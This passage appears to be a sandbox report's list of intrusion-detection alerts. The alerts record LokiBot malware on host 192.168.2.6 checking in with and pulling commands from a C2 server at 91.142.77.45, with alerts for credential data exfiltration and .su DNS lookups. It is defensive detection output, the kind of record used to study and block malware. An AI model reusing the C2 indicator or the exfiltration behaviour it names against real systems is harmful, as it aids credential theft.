Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.853943532014169 11/03/22-12:30:54.819244
SID:	2014169
Source Port:	53943
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549730802024318 11/03/22-12:31:07.626823
SID:	2024318
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497102025483 11/03/22-12:30:19.791139
SID:	2025483
Source Port:	80
Destination Port:	49710
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549735802024313 11/03/22-12:31:27.516452
SID:	2024313
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549721802025381 11/03/22-12:30:48.032802
SID:	2025381
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.855629532014169 11/03/22-12:31:09.419344
SID:	2014169
Source Port:	55629
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549731802825766 11/03/22-12:31:09.511791
SID:	2825766
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549738802025381 11/03/22-12:31:33.019427
SID:	2025381
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549712802024313 11/03/22-12:30:22.162497
SID:	2024313
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497142025483 11/03/22-12:30:29.899760
SID:	2025483
Source Port:	80
Destination Port:	49714
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497162025483 11/03/22-12:30:34.572782
SID:	2025483
Source Port:	80
Destination Port:	49716
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549706802021641 11/03/22-12:30:09.785093
SID:	2021641
Source Port:	49706
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549730802024313 11/03/22-12:31:07.626823
SID:	2024313
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.861609532014169 11/03/22-12:30:50.734926
SID:	2014169
Source Port:	61609
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862958532014169 11/03/22-12:31:41.802948
SID:	2014169
Source Port:	62958
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549735802024318 11/03/22-12:31:27.516452
SID:	2024318
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.849232532014169 11/03/22-12:31:30.955921
SID:	2014169
Source Port:	49232
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862848532014169 11/03/22-12:31:45.492508
SID:	2014169
Source Port:	62848
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549733802025381 11/03/22-12:31:22.614964
SID:	2025381
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549732802021641 11/03/22-12:31:20.467945
SID:	2021641
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549720802024318 11/03/22-12:30:45.793165
SID:	2024318
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549718802025381 11/03/22-12:30:37.003049
SID:	2025381
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549721802825766 11/03/22-12:30:48.032802
SID:	2825766
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549720802024313 11/03/22-12:30:45.793165
SID:	2024313
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549714802024318 11/03/22-12:30:27.432237
SID:	2024318
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549719802024318 11/03/22-12:30:42.564459
SID:	2024318
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549725802024313 11/03/22-12:30:57.918358
SID:	2024313
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549715802825766 11/03/22-12:30:31.132672
SID:	2825766
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549719802024313 11/03/22-12:30:42.564459
SID:	2024313
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549710802825766 11/03/22-12:30:18.297577
SID:	2825766
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549734802021641 11/03/22-12:31:25.377976
SID:	2021641
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862910532014169 11/03/22-12:30:27.345778
SID:	2014169
Source Port:	62910
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497352025483 11/03/22-12:31:28.883670
SID:	2025483
Source Port:	80
Destination Port:	49735
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549737802021641 11/03/22-12:31:31.046497
SID:	2021641
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497422025483 11/03/22-12:31:43.475626
SID:	2025483
Source Port:	80
Destination Port:	49742
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549714802024313 11/03/22-12:30:27.432237
SID:	2024313
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549711802025381 11/03/22-12:30:20.264286
SID:	2025381
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549722802024313 11/03/22-12:30:50.822444
SID:	2024313
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856331532014169 11/03/22-12:30:13.938466
SID:	2014169
Source Port:	56331
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.849448532014169 11/03/22-12:30:17.960732
SID:	2014169
Source Port:	49448
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.850506532014169 11/03/22-12:30:15.990659
SID:	2014169
Source Port:	50506
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.859752532014169 11/03/22-12:31:35.521025
SID:	2014169
Source Port:	59752
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549722802024318 11/03/22-12:30:50.822444
SID:	2024318
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549726802021641 11/03/22-12:30:59.657451
SID:	2021641
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549741802025381 11/03/22-12:31:39.946873
SID:	2025381
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497392025483 11/03/22-12:31:37.318947
SID:	2025483
Source Port:	80
Destination Port:	49739
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549709802021641 11/03/22-12:30:16.075566
SID:	2021641
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549727802024318 11/03/22-12:31:01.987085
SID:	2024318
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549728802825766 11/03/22-12:31:03.903902
SID:	2825766
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497312025483 11/03/22-12:31:10.691873
SID:	2025483
Source Port:	80
Destination Port:	49731
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.865198532014169 11/03/22-12:30:25.312645
SID:	2014169
Source Port:	65198
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549721802021641 11/03/22-12:30:48.032802
SID:	2021641
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549715802024318 11/03/22-12:30:31.132672
SID:	2024318
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549726802825766 11/03/22-12:30:59.657451
SID:	2825766
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549724802024313 11/03/22-12:30:54.913991
SID:	2024313
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549710802025381 11/03/22-12:30:18.297577
SID:	2025381
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549712802021641 11/03/22-12:30:22.162497
SID:	2021641
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549735802825766 11/03/22-12:31:27.516452
SID:	2825766
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549744802825766 11/03/22-12:31:45.577786
SID:	2825766
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549740802021641 11/03/22-12:31:37.627027
SID:	2021641
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549743802024318 11/03/22-12:31:43.782645
SID:	2024318
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549743802024313 11/03/22-12:31:43.782645
SID:	2024313
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549707802025381 11/03/22-12:30:11.977904
SID:	2025381
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549726802025381 11/03/22-12:30:59.657451
SID:	2025381
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549725802024318 11/03/22-12:30:57.918358
SID:	2024318
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549707802825766 11/03/22-12:30:11.977904
SID:	2825766
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497342025483 11/03/22-12:31:27.178865
SID:	2025483
Source Port:	80
Destination Port:	49734
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549731802021641 11/03/22-12:31:09.511791
SID:	2021641
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.852481532014169 11/03/22-12:30:53.275834
SID:	2014169
Source Port:	52481
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549720802025381 11/03/22-12:30:45.793165
SID:	2025381
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.864404532014169 11/03/22-12:31:43.694917
SID:	2014169
Source Port:	64404
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549708802025381 11/03/22-12:30:14.035064
SID:	2025381
Source Port:	49708
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549735802021641 11/03/22-12:31:27.516452
SID:	2021641
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549706802024317 11/03/22-12:30:09.785093
SID:	2024317
Source Port:	49706
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497322025483 11/03/22-12:31:21.820409
SID:	2025483
Source Port:	80
Destination Port:	49732
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.852865532014169 11/03/22-12:31:37.538077
SID:	2014169
Source Port:	52865
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549725802825766 11/03/22-12:30:57.918358
SID:	2825766
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497292025483 11/03/22-12:31:07.339016
SID:	2025483
Source Port:	80
Destination Port:	49729
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549724802024318 11/03/22-12:30:54.913991
SID:	2024318
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549706802024312 11/03/22-12:30:09.785093
SID:	2024312
Source Port:	49706
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497212025483 11/03/22-12:30:50.362964
SID:	2025483
Source Port:	80
Destination Port:	49721
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497232025483 11/03/22-12:30:54.557575
SID:	2025483
Source Port:	80
Destination Port:	49723
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549739802025381 11/03/22-12:31:35.606377
SID:	2025381
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.863863532014169 11/03/22-12:30:30.240421
SID:	2014169
Source Port:	63863
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549744802021641 11/03/22-12:31:45.577786
SID:	2021641
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549745802025381 11/03/22-12:31:50.569101
SID:	2025381
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549736802025381 11/03/22-12:31:29.221112
SID:	2025381
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549741802021641 11/03/22-12:31:39.946873
SID:	2021641
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549742802025381 11/03/22-12:31:41.893270
SID:	2025381
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862538532014169 11/03/22-12:30:34.919732
SID:	2014169
Source Port:	62538
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.858595532014169 11/03/22-12:30:11.893252
SID:	2014169
Source Port:	58595
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549716802021641 11/03/22-12:30:32.992651
SID:	2021641
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549728802024313 11/03/22-12:31:03.903902
SID:	2024313
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549725802021641 11/03/22-12:30:57.918358
SID:	2021641
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549728802024318 11/03/22-12:31:03.903902
SID:	2024318
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.855956532014169 11/03/22-12:31:47.481296
SID:	2014169
Source Port:	55956
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549734802024313 11/03/22-12:31:25.377976
SID:	2024313
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549719802021641 11/03/22-12:30:42.564459
SID:	2021641
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549723802025381 11/03/22-12:30:53.367985
SID:	2025381
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549737802024313 11/03/22-12:31:31.046497
SID:	2024313
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

